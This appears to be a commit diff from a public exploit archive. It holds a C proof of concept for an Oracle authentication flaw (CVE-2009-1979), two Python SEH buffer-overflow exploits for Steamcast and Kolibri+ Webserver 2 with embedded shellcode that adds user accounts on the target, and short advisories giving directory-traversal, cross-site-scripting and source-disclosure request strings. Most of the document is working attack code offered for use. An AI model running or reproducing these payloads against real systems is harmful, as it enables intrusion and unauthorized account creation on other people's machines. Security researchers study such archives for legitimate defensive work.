"\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D\x5F"
"\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65\x78"
"\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x4D"
"\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B\x47"
"\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08\x00"
"\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00\x09"
"\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00\x00"
"\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06\x64"
"\x65\x6E\x6E\x69\x73\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45"
"\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x43\x48\x41"
"\x52\x53\x45\x54\x03\x00\x00\x00\x03\x31\x37\x38\x00\x00\x00\x00"
"\x17\x00\x00\x00\x17\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49"
"\x45\x4E\x54\x5F\x4C\x49\x42\x5F\x54\x59\x50\x45\x01\x00\x00\x00"
"\x01\x31\x00\x00\x00\x00\x1A\x00\x00\x00\x1A\x53\x45\x53\x53\x49"
"\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x44\x52\x49\x56\x45\x52"
"\x5F\x4E\x41\x4D\x45\x0E\x00\x00\x00\x0E\x63\x78\x5F\x4F\x72\x61"
"\x63\x6C\x65\x2D\x34\x2E\x34\x20\x00\x00\x00\x00\x16\x00\x00\x00"
"\x16\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F"
"\x56\x45\x52\x53\x49\x4F\x4E\x09\x00\x00\x00\x09\x31\x38\x35\x35"
"\x39\x39\x34\x38\x38\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45"
"\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x4C\x4F\x42"
"\x41\x54\x54\x52\x01\x00\x00\x00\x01\x31\x00\x00\x00\x00\x08\x00"
"\x00\x00\x08\x41\x55\x54\x48\x5F\x41\x43\x4C\x04\x00\x00\x00\x04"
"\x34\x34\x30\x30\x00\x00\x00\x00\x12\x00\x00\x00\x12\x41\x55\x54"
"\x48\x5F\x41\x4C\x54\x45\x52\x5F\x53\x45\x53\x53\x49\x4F\x4E\xE9"
"\x01\x00\x00\xFE\xFF\x41\x4C\x54\x45\x52\x20\x53\x45\x53\x53\x49"
"\x4F\x4E\x20\x53\x45\x54\x20\x4E\x4C\x53\x5F\x4C\x41\x4E\x47\x55"
"\x41\x47\x45\x3D\x20\x27\x41\x4D\x45\x52\x49\x43\x41\x4E\x27\x20"
"\x4E\x4C\x53\x5F\x54\x45\x52\x52\x49\x54\x4F\x52\x59\x3D\x20\x27"
"\x41\x4D\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x43\x55\x52"
"\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x49"
"\x53\x4F\x5F\x43\x55\x52\x52\x45\x4E\x43\x59\x3D\x20\x27\x41\x4D"
"\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x4E\x55\x4D\x45\x52"
"\x49\x43\x5F\x43\x48\x41\x52\x41\x43\x54\x45\x52\x53\x3D\x20\x27"
"\x2E\x2C\x27\x20\x4E\x4C\x53\x5F\x43\x41\x4C\x45\x4E\x44\x41\x52"
"\x3D\x20\x27\x47\x52\x45\x47\x4F\x52\x49\x41\x4E\x27\x20\x4E\x4C"
"\x53\x5F\x44\x41\x54\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27"
"\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x27\x20\x4E\x4C\x53\x5F\x44"
"\x41\x54\x45\x5F\x4C\x41\x4E\x47\x55\x41\x47\x45\x3D\x20\x27\x41"
"\x4D\x45\x52\x49\x43\x41\x4E\x27\x20\x4E\x4C\x53\x5F\x53\x4F\x52"
"\x54\x3D\x20\x27\x42\x49\x4E\x41\x52\x59\x27\x20\x54\x49\x4D\x45"
"\x5F\x5A\x4F\x4E\xEA\x45\x3D\x20\x27\x2B\x30\x33\x3A\x30\x30\x27"
"\x20\x4E\x4C\x53\x5F\x43\x4F\x4D\x50\x3D\x20\x27\x42\x49\x4E\x41"
"\x52\x59\x27\x20\x4E\x4C\x53\x5F\x44\x55\x41\x4C\x5F\x43\x55\x52"
"\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x54"
"\x49\x4D\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27\x48\x48\x2E"
"\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C\x53"
"\x5F\x54\x49\x4D\x45\x53\x54\x41\x4D\x50\x5F\x46\x4F\x52\x4D\x41"
"\x54\x3D\x20\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48"
"\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C"
"\x53\x5F\x54\x49\x4D\x45\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54"
"\x3D\x20\x27\x48\x48\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41"
"\x4D\x20\x54\x5A\x52\x27\x20\x4E\x4C\x53\x5F\x54\x49\x4D\x45\x53"
"\x54\x41\x4D\x50\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20"
"\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48\x2E\x4D\x49"
"\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x20\x54\x5A\x52\x27\x00\x00"
"\x00\x00\x00\x00\x17\x00\x00\x00\x17\x41\x55\x54\x48\x5F\x4C\x4F"
"\x47\x49\x43\x41\x4C\x5F\x53\x45\x53\x53\x49\x4F\x4E\x5F\x49\x44"
"\x20\x00\x00\x00\x20\x35\x44\x46\x34\x37\x43\x45\x35\x42\x38\x42"
"\x32\x34\x43\x46\x38\x42\x46\x42\x36\x46\x30\x46\x36\x39\x32\x42"
"\x38\x46\x42\x39\x38\x00\x00\x00\x00\x10\x00\x00\x00\x10\x41\x55"
"\x54\x48\x5F\x46\x41\x49\x4C\x4F\x56\x45\x52\x5F\x49\x44\x00\x00"
"\x00\x00\x00\x00\x00\x00"
,1318);
pkt1318[0x41]=0x80;
s_send (s, pkt1318, 1318);
assert (closesocket (s)==0);
return true;
}
else
{
printf ("while connect(): select() returns zero\n");
assert (closesocket (s)==0);
return false;
};
};
void main(int argc, char * argv[])
{
printf ("CVE-2009-1979 PoC. Working at least on 10.2.0.4 win32\n");
printf ("Vulnerability discovered by Dennis Yurichev <dennis@conus.info> http://blogs.conus.info\n");
if (argv[1]==NULL)
{
printf ("use: %s <hostname>\n", argv[0]);
return;
};
try_host (argv[1]);
};

2
platforms/windows/remote/20324.txt
View file

@ -1,7 +1,7 @@
source: http://www.securityfocus.com/bid/1839/info
Acquiring access to known files outside of the web root is possible through directory traversal techniques in both iPlanet Certificate Management System (CMS) and Netscape Directory Server. This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability:
Acquiring access to known files outside of the web root is possible through directory traversal techniques in both iPlanet Certificate Management System (CMS). This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability:
- The Agent services server on port 8100/tcp
- The End Entity services server on port 443/tcp (Accessible through SSL)

2
platforms/windows/remote/20325.txt
View file

@ -1,7 +1,7 @@
source: http://www.securityfocus.com/bid/1839/info
Acquiring access to known files outside of the web root is possible through directory traversal techniques in both iPlanet Certificate Management System (CMS) and Netscape Directory Server. This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability:
Acquiring access to known files outside of the web root is possible through directory traversal techniques in Netscape Directory Server. This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability:
- The Agent services server on port 8100/tcp
- The End Entity services server on port 443/tcp (Accessible through SSL)

2
platforms/windows/remote/32517.html
View file

@ -1,6 +1,6 @@
source: http://www.securityfocus.com/bid/31855/info
Multiple vendors' web browsers are prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
Mozilla Firefox 3 is prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
Successfully exploiting this issue may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of an FTP session. This may allow the attacker to perform malicious actions in a user's browser or redirect the user to a malicious site; other attacks are also possible.

2
platforms/windows/remote/32518.txt → platforms/windows/remote/32518.html
View file

@ -1,6 +1,6 @@
source: http://www.securityfocus.com/bid/31855/info
Multiple vendors' web browsers are prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
Google Chrome 0.2.149 is prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
Successfully exploiting this issue may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of an FTP session. This may allow the attacker to perform malicious actions in a user's browser or redirect the user to a malicious site; other attacks are also possible.

118
platforms/windows/remote/8422.py
View file

@ -1,59 +1,59 @@
#!/usr/bin/python
#[*] Usage : steamcast.py [victime_ip]
#[*] Bug : Steamcast(HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]
#[*] Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln.
#[*] Tested on : Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D
#[*] Translate by Cyb3r-1st : esse7 embe7 embou :p
#Short Description : The previous exploit runs small shellcodes only, this one is the opposite :)
#Note : The problem is that we need to find a dll wich its not compiled with GS, in my case i founded idmmbc its a loaded dll of internet download manager so try to find an unsafe dll.
#Other note : The shellcode will be executed when the program will be closed.
#Another one : When you have problems with running the exploit msg me before you msg str0ke.
import sys, socket
import struct
host = sys.argv[1]
port = 8000
# win32_adduser - PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x44\x7A\x32\x37\x44\x7A\x32\x37\x29\xc9\x83\xe9\xcd\xd9\xee\xd9"
"\x74\x24\xf4\x5b\x81\x73\x13\x05\x16\xf2\x06\x83\xeb\xfc\xe2\xf4"
"\xf9\xfe\xb6\x06\x05\x16\x79\x43\x39\x9d\x8e\x03\x7d\x17\x1d\x8d"
"\x4a\x0e\x79\x59\x25\x17\x19\x4f\x8e\x22\x79\x07\xeb\x27\x32\x9f"
"\xa9\x92\x32\x72\x02\xd7\x38\x0b\x04\xd4\x19\xf2\x3e\x42\xd6\x02"
"\x70\xf3\x79\x59\x21\x17\x19\x60\x8e\x1a\xb9\x8d\x5a\x0a\xf3\xed"
"\x8e\x0a\x79\x07\xee\x9f\xae\x22\x01\xd5\xc3\xc6\x61\x9d\xb2\x36"
"\x80\xd6\x8a\x0a\x8e\x56\xfe\x8d\x75\x0a\x5f\x8d\x6d\x1e\x19\x0f"
"\x8e\x96\x42\x06\x05\x16\x79\x6e\x39\x49\xc3\xf0\x65\x40\x7b\xfe"
"\x86\xd6\x89\x56\x6d\xe6\x78\x02\x5a\x7e\x6a\xf8\x8f\x18\xa5\xf9"
"\xe2\x75\x9f\x62\x2b\x73\x8a\x63\x25\x39\x91\x26\x6b\x73\x86\x26"
"\x70\x65\x97\x74\x25\x72\x88\x26\x37\x21\xd2\x29\x44\x52\xb6\x26"
"\x23\x30\xd2\x68\x60\x62\xd2\x6a\x6a\x75\x93\x6a\x62\x64\x9d\x73"
"\x75\x36\xb3\x62\x68\x7f\x9c\x6f\x76\x62\x80\x67\x71\x79\x80\x75"
"\x25\x72\x88\x26\x2a\x57\xb6\x42\x05\x16\xf2\x06")
shellunt=(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x44\x7A\x32\x37\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
exploit = "\x90"*(1003-len(shellcode)) + shellcode + "\xEB\x06\x90\x90" + "\xDB\x27\x02\x10" + "\x90"*20 + shellunt
#It needs a loop to works
while 1:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
head = "GET / HTTP/1.1\r\n"
head += "Host: "+host+"\r\n"
head += exploit+"\r\n"
head += "\r\n\r\n"
s.send(head)
# milw0rm.com [2009-04-13]
#!/usr/bin/python
#[*] Usage : steamcast.py [victime_ip]
#[*] Bug : Steamcast(HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]
#[*] Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln.
#[*] Tested on : Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D
#[*] Translate by Cyb3r-1st : esse7 embe7 embou :p
#Short Description : The previous exploit runs small shellcodes only, this one is the opposite :)
#Note : The problem is that we need to find a dll wich its not compiled with GS, in my case i founded idmmbc its a loaded dll of internet download manager so try to find an unsafe dll.
#Other note : The shellcode will be executed when the program will be closed.
#Another one : When you have problems with running the exploit msg me before you msg str0ke.
import sys, socket
import struct
host = sys.argv[1]
port = 8000
# win32_adduser - PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x44\x7A\x32\x37\x44\x7A\x32\x37\x29\xc9\x83\xe9\xcd\xd9\xee\xd9"
"\x74\x24\xf4\x5b\x81\x73\x13\x05\x16\xf2\x06\x83\xeb\xfc\xe2\xf4"
"\xf9\xfe\xb6\x06\x05\x16\x79\x43\x39\x9d\x8e\x03\x7d\x17\x1d\x8d"
"\x4a\x0e\x79\x59\x25\x17\x19\x4f\x8e\x22\x79\x07\xeb\x27\x32\x9f"
"\xa9\x92\x32\x72\x02\xd7\x38\x0b\x04\xd4\x19\xf2\x3e\x42\xd6\x02"
"\x70\xf3\x79\x59\x21\x17\x19\x60\x8e\x1a\xb9\x8d\x5a\x0a\xf3\xed"
"\x8e\x0a\x79\x07\xee\x9f\xae\x22\x01\xd5\xc3\xc6\x61\x9d\xb2\x36"
"\x80\xd6\x8a\x0a\x8e\x56\xfe\x8d\x75\x0a\x5f\x8d\x6d\x1e\x19\x0f"
"\x8e\x96\x42\x06\x05\x16\x79\x6e\x39\x49\xc3\xf0\x65\x40\x7b\xfe"
"\x86\xd6\x89\x56\x6d\xe6\x78\x02\x5a\x7e\x6a\xf8\x8f\x18\xa5\xf9"
"\xe2\x75\x9f\x62\x2b\x73\x8a\x63\x25\x39\x91\x26\x6b\x73\x86\x26"
"\x70\x65\x97\x74\x25\x72\x88\x26\x37\x21\xd2\x29\x44\x52\xb6\x26"
"\x23\x30\xd2\x68\x60\x62\xd2\x6a\x6a\x75\x93\x6a\x62\x64\x9d\x73"
"\x75\x36\xb3\x62\x68\x7f\x9c\x6f\x76\x62\x80\x67\x71\x79\x80\x75"
"\x25\x72\x88\x26\x2a\x57\xb6\x42\x05\x16\xf2\x06")
shellunt=(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x44\x7A\x32\x37\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
exploit = "\x90"*(1003-len(shellcode)) + shellcode + "\xEB\x06\x90\x90" + "\xDB\x27\x02\x10" + "\x90"*20 + shellunt
#It needs a loop to works
while 1:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
head = "GET / HTTP/1.1\r\n"
head += "Host: "+host+"\r\n"
head += exploit+"\r\n"
head += "\r\n\r\n"
s.send(head)
# milw0rm.com [2009-04-13]

42
platforms/windows/remote/9638.txt
View file

@ -1,21 +1,21 @@
#############################################################################################
#
# Name : Kolibri+ Webserver 2 , Remote file disclousure exploit
# Author : Skull-HacKeR
#
#############################################################################################
[*] Download Page :
http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol
[*] Attack type : Remote
[*] Exploitation
Exploit:
http://127.0.0.1/default.asp.
http://127.0.0.1/default.php.
# milw0rm.com [2009-09-11]
#############################################################################################
#
# Name : Kolibri+ Webserver 2 , Remote file disclousure exploit
# Author : Skull-HacKeR
#
#############################################################################################
[*] Download Page :
http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol
[*] Attack type : Remote
[*] Exploitation
Exploit:
http://127.0.0.1/default.asp.
http://127.0.0.1/default.php.
# milw0rm.com [2009-09-11]

170
platforms/windows/remote/9644.py
View file

@ -1,85 +1,85 @@
#!/usr/bin/python
#
# Could not get this to work on XP SP3. php5ts.dll is the only module with safe seh off but could not get the pop pop ret
# to work correctly despite the large number of usable addresses that were tested.
#
# $ ./kolibri.py 192.168.1.146 8080
#
# [*] Kolibri+ Webserver 2 SEH Overwrite
# [*] Written by blake
# [*] Tested on Windows XP SP 1
# [*] Denial of Service found by Usman Saeed
#
# [+] Connecting to 192.168.1.146 on port 8080
# [+] Sending payload
# [+] Done. User jenny created with the password of pass on 192.168.1.146
import socket, sys
print "\n[*] Kolibri+ Webserver 2 SEH Overwrite"
print "[*] Written by blake"
print "[*] Tested on Windows XP SP 1"
print "[*] Denial of Service found by Usman Saeed\n"
if len(sys.argv)!= 3:
print "[*] Usage: %s <ip> <port>"
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])
# windows/adduser - 446 bytes Encoder: x86/alpha_mixed
# USER=jenny, EXITFUNC=seh, PASS=pass
shellcode = (
"\x89\xe6\xdb\xc8\xd9\x76\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x4b\x58\x47\x34\x45\x50\x43\x30\x43\x30\x4c\x4b\x50"
"\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x42\x58\x43\x31\x4a\x4f"
"\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"
"\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x50\x31"
"\x49\x50\x4c\x59\x4e\x4c\x4b\x34\x49\x50\x44\x34\x45\x57\x49"
"\x51\x48\x4a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4b\x44\x47\x4b"
"\x51\x44\x51\x34\x45\x54\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x46"
"\x44\x45\x51\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b"
"\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45"
"\x51\x4a\x4b\x4b\x39\x51\x4c\x47\x54\x45\x54\x49\x53\x51\x4f"
"\x50\x31\x4a\x56\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46\x50"
"\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d"
"\x4c\x4b\x43\x58\x45\x58\x4d\x59\x4a\x58\x4c\x43\x49\x50\x42"
"\x4a\x50\x50\x45\x38\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x43\x58"
"\x4a\x38\x4b\x4e\x4c\x4a\x44\x4e\x46\x37\x4b\x4f\x4a\x47\x42"
"\x43\x42\x4d\x43\x54\x46\x4e\x43\x55\x43\x48\x43\x55\x51\x30"
"\x46\x4f\x42\x43\x51\x30\x42\x4e\x42\x45\x44\x34\x47\x50\x44"
"\x35\x42\x53\x45\x35\x43\x42\x51\x30\x43\x5a\x43\x55\x42\x4e"
"\x42\x4e\x43\x49\x47\x50\x42\x50\x43\x51\x43\x43\x43\x43\x51"
"\x30\x46\x4f\x51\x51\x51\x54\x51\x54\x51\x30\x51\x36\x47\x56"
"\x47\x50\x42\x4e\x45\x35\x44\x34\x47\x50\x42\x4c\x42\x4f\x43"
"\x53\x43\x51\x42\x4c\x43\x57\x42\x52\x42\x4f\x42\x55\x44\x30"
"\x51\x30\x51\x51\x45\x34\x42\x4d\x42\x49\x42\x4e\x45\x39\x44"
"\x33\x44\x34\x43\x42\x43\x51\x44\x34\x42\x4f\x42\x52\x43\x43"
"\x47\x50\x43\x5a\x45\x35\x42\x4e\x42\x4e\x43\x49\x51\x30\x46"
"\x4f\x47\x31\x51\x54\x47\x34\x43\x30\x41\x41")
payload = "\x41" * 8 # junk buffer
payload += "\x90" * 10 # nop sled
sc = shellcode # 446 bytes of shellcode
jump_near = "\xe9\x34\xfe\xff\xff" # jump near -460 bytes
next_seh = "\xeb\xf9\xff\xff" # short jump back -7 bytes
seh = "\x6f\x2a\xe6\x77" # p/p/r from kernel32.dll
junk = "\x41" * 424 # junk buffer
print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
print "[+] Sending payload"
s.send("GET /index.html" + payload + sc + jump_near + next_seh + seh + junk + " HTTP/1.0\r\n\r\n")
s.close()
print "[+] Done. User jenny created with the password of pass on %s\n" % host
except:
print "[x] Could not connect!"
# milw0rm.com [2009-09-11]
#!/usr/bin/python
#
# Could not get this to work on XP SP3. php5ts.dll is the only module with safe seh off but could not get the pop pop ret
# to work correctly despite the large number of usable addresses that were tested.
#
# $ ./kolibri.py 192.168.1.146 8080
#
# [*] Kolibri+ Webserver 2 SEH Overwrite
# [*] Written by blake
# [*] Tested on Windows XP SP 1
# [*] Denial of Service found by Usman Saeed
#
# [+] Connecting to 192.168.1.146 on port 8080
# [+] Sending payload
# [+] Done. User jenny created with the password of pass on 192.168.1.146
import socket, sys
print "\n[*] Kolibri+ Webserver 2 SEH Overwrite"
print "[*] Written by blake"
print "[*] Tested on Windows XP SP 1"
print "[*] Denial of Service found by Usman Saeed\n"
if len(sys.argv)!= 3:
print "[*] Usage: %s <ip> <port>"
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])
# windows/adduser - 446 bytes Encoder: x86/alpha_mixed
# USER=jenny, EXITFUNC=seh, PASS=pass
shellcode = (
"\x89\xe6\xdb\xc8\xd9\x76\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x4b\x58\x47\x34\x45\x50\x43\x30\x43\x30\x4c\x4b\x50"
"\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x42\x58\x43\x31\x4a\x4f"
"\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"
"\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x50\x31"
"\x49\x50\x4c\x59\x4e\x4c\x4b\x34\x49\x50\x44\x34\x45\x57\x49"
"\x51\x48\x4a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4b\x44\x47\x4b"
"\x51\x44\x51\x34\x45\x54\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x46"
"\x44\x45\x51\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b"
"\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45"
"\x51\x4a\x4b\x4b\x39\x51\x4c\x47\x54\x45\x54\x49\x53\x51\x4f"
"\x50\x31\x4a\x56\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46\x50"
"\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d"
"\x4c\x4b\x43\x58\x45\x58\x4d\x59\x4a\x58\x4c\x43\x49\x50\x42"
"\x4a\x50\x50\x45\x38\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x43\x58"
"\x4a\x38\x4b\x4e\x4c\x4a\x44\x4e\x46\x37\x4b\x4f\x4a\x47\x42"
"\x43\x42\x4d\x43\x54\x46\x4e\x43\x55\x43\x48\x43\x55\x51\x30"
"\x46\x4f\x42\x43\x51\x30\x42\x4e\x42\x45\x44\x34\x47\x50\x44"
"\x35\x42\x53\x45\x35\x43\x42\x51\x30\x43\x5a\x43\x55\x42\x4e"
"\x42\x4e\x43\x49\x47\x50\x42\x50\x43\x51\x43\x43\x43\x43\x51"
"\x30\x46\x4f\x51\x51\x51\x54\x51\x54\x51\x30\x51\x36\x47\x56"
"\x47\x50\x42\x4e\x45\x35\x44\x34\x47\x50\x42\x4c\x42\x4f\x43"
"\x53\x43\x51\x42\x4c\x43\x57\x42\x52\x42\x4f\x42\x55\x44\x30"
"\x51\x30\x51\x51\x45\x34\x42\x4d\x42\x49\x42\x4e\x45\x39\x44"
"\x33\x44\x34\x43\x42\x43\x51\x44\x34\x42\x4f\x42\x52\x43\x43"
"\x47\x50\x43\x5a\x45\x35\x42\x4e\x42\x4e\x43\x49\x51\x30\x46"
"\x4f\x47\x31\x51\x54\x47\x34\x43\x30\x41\x41")
payload = "\x41" * 8 # junk buffer
payload += "\x90" * 10 # nop sled
sc = shellcode # 446 bytes of shellcode
jump_near = "\xe9\x34\xfe\xff\xff" # jump near -460 bytes
next_seh = "\xeb\xf9\xff\xff" # short jump back -7 bytes
seh = "\x6f\x2a\xe6\x77" # p/p/r from kernel32.dll
junk = "\x41" * 424 # junk buffer
print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
print "[+] Sending payload"
s.send("GET /index.html" + payload + sc + jump_near + next_seh + seh + junk + " HTTP/1.0\r\n\r\n")
s.close()
print "[+] Done. User jenny created with the password of pass on %s\n" % host
except:
print "[x] Could not connect!"
# milw0rm.com [2009-09-11]

56
platforms/windows/remote/9650.txt
View file

@ -1,28 +1,28 @@
#################################################################################
# #
# Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure #
# aka: More fun with Kolibri+ 2 webserver #
# Found By: Dr_IDE #
# Tested On: Windows XPSP3 #
# #
#################################################################################
- Description -
Kolibri+ 2 Web Server is a Windows based HTTP server. This is the latest version of
the application available.
This vulnerability is similar to the one reported earlier by Skull-HacKeR.
Kolibri+ 2 is vulnerable to remote arbitrary source code disclosure
(download in this case) by the following means.
- Technical Details -
http://[ webserver IP]/[ file ][::$DATA]
http://172.16.2.101/default.asp::$DATA
http://172.16.2.101/index.php::$DATA
# milw0rm.com [2009-09-11]
#################################################################################
# #
# Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure #
# aka: More fun with Kolibri+ 2 webserver #
# Found By: Dr_IDE #
# Tested On: Windows XPSP3 #
# #
#################################################################################
- Description -
Kolibri+ 2 Web Server is a Windows based HTTP server. This is the latest version of
the application available.
This vulnerability is similar to the one reported earlier by Skull-HacKeR.
Kolibri+ 2 is vulnerable to remote arbitrary source code disclosure
(download in this case) by the following means.
- Technical Details -
http://[ webserver IP]/[ file ][::$DATA]
http://172.16.2.101/default.asp::$DATA
http://172.16.2.101/index.php::$DATA
# milw0rm.com [2009-09-11]